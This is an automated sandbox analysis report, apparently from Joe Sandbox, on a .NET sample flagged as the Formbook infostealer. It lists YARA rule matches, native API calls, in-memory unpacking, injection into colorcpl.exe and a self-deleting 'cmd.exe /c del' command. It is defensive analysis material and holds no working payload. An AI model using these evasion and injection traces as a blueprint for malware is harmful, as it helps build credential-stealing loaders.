            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: 3cGH9Bakuq.exe, FlowPanelManager.csLong String: Length: 34816
            Source: 0.0.3cGH9Bakuq.exe.240000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 0.2.3cGH9Bakuq.exe.240000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 5.2.3cGH9Bakuq.exe.a0000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 6.0.3cGH9Bakuq.exe.440000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 3cGH9Bakuq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 5_2_000A695C5_2_000A695C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004010306_2_00401030
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B8DD6_2_0041B8DD
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041C14C6_2_0041C14C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00408C6C6_2_00408C6C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00408C706_2_00408C70
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00402D906_2_00402D90
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041CE9E6_2_0041CE9E
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00402FB06_2_00402FB0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0044695C6_2_0044695C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A015_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB09015_2_04EFB090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF841F15_2_04EF841F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA100215_2_04FA1002
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E015_2_04EFD5E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1258115_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB1D5515_2_04FB1D55
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE0D2015_2_04EE0D20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0412015_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEF90015_2_04EEF900
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F06E3015_2_04F06E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1EBB015_2_04F1EBB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEB8DD15_2_00CEB8DD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEC14C15_2_00CEC14C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CED33015_2_00CED330
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04EEB150 appears 35 times
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004185B0 NtCreateFile,6_2_004185B0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418660 NtReadFile,6_2_00418660
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004186E0 NtClose,6_2_004186E0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418790 NtAllocateVirtualMemory,6_2_00418790
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004185AA NtCreateFile,6_2_004185AA
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041865A NtReadFile,6_2_0041865A
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004186DF NtClose,6_2_004186DF
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041878D NtAllocateVirtualMemory,6_2_0041878D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04F29860
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29840 NtDelayExecution,LdrInitializeThunk,15_2_04F29840
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F295D0 NtClose,LdrInitializeThunk,15_2_04F295D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F299A0 NtCreateSection,LdrInitializeThunk,15_2_04F299A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29540 NtReadFile,LdrInitializeThunk,15_2_04F29540
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04F29910
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F296E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04F296E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F296D0 NtCreateKey,LdrInitializeThunk,15_2_04F296D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04F29660
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29650 NtQueryValueKey,LdrInitializeThunk,15_2_04F29650
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A50 NtCreateFile,LdrInitializeThunk,15_2_04F29A50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29FE0 NtCreateMutant,LdrInitializeThunk,15_2_04F29FE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29780 NtMapViewOfSection,LdrInitializeThunk,15_2_04F29780
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29710 NtQueryInformationToken,LdrInitializeThunk,15_2_04F29710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F298F0 NtReadVirtualMemory,15_2_04F298F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F298A0 NtWriteVirtualMemory,15_2_04F298A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2B040 NtSuspendThread,15_2_04F2B040
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29820 NtEnumerateKey,15_2_04F29820
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F295F0 NtQueryInformationFile,15_2_04F295F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F299D0 NtCreateProcessEx,15_2_04F299D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29560 NtWriteFile,15_2_04F29560
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29950 NtQueueApcThread,15_2_04F29950
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2AD30 NtSetContextThread,15_2_04F2AD30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29520 NtWaitForSingleObject,15_2_04F29520
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A80 NtOpenDirectoryObject,15_2_04F29A80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29670 NtQueryInformationProcess,15_2_04F29670
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A20 NtResumeThread,15_2_04F29A20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29610 NtEnumerateValueKey,15_2_04F29610
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A10 NtQuerySection,15_2_04F29A10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A00 NtProtectVirtualMemory,15_2_04F29A00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A3B0 NtGetContextThread,15_2_04F2A3B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F297A0 NtUnmapViewOfSection,15_2_04F297A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29770 NtSetInformationFile,15_2_04F29770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A770 NtOpenThread,15_2_04F2A770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29760 NtOpenProcess,15_2_04F29760
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29730 NtQueryVirtualMemory,15_2_04F29730
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A710 NtOpenProcessToken,15_2_04F2A710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29B00 NtSetValueKey,15_2_04F29B00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE85B0 NtCreateFile,15_2_00CE85B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE86E0 NtClose,15_2_00CE86E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8660 NtReadFile,15_2_00CE8660
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8790 NtAllocateVirtualMemory,15_2_00CE8790
            Source: 3cGH9Bakuq.exe, 00000000.00000002.691742777.0000000008740000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686274674.000000000098A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000000.660737269.00000000002DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000005.00000000.683042468.000000000013C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.780397796.0000000000C2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.779961917.00000000004DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.781097720.0000000000FCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exeBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3cGH9Bakuq.exeVirustotal: Detection: 26%
            Source: 3cGH9Bakuq.exeReversingLabs: Detection: 22%
            Source: 3cGH9Bakuq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exeJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3cGH9Bakuq.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@6/4
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 3cGH9Bakuq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 3cGH9Bakuq.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: colorcpl.pdbGCTL source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: colorcpl.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: 3cGH9Bakuq.exe, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.3cGH9Bakuq.exe.240000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.3cGH9Bakuq.exe.240000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.3cGH9Bakuq.exe.a0000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.0.3cGH9Bakuq.exe.440000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B6644F push esi; ret 0_2_04B66452
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B6644B push esi; ret 0_2_04B6644E
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66448 push esi; ret 0_2_04B6644A
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66593 push esi; ret 0_2_04B6659A
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B665D7 push edi; ret 0_2_04B665DA
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B665D5 push edi; ret 0_2_04B665D6
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66560 push esi; ret 0_2_04B66592
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66758 push edi; ret 0_2_04B6675A
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418846 pushad ; retf 6_2_00418847
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B85C push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00415184 pushfd ; iretd 6_2_004151A3
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041CC51 push edx; ret 6_2_0041CC52
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041547D push es; retf 6_2_00415481
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00415DCA push 118C2D45h; retf 6_2_00415DCF
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7F2 push eax; ret 6_2_0041B7F8
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7FB push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7A5 push eax; ret 6_2_0041B7F8
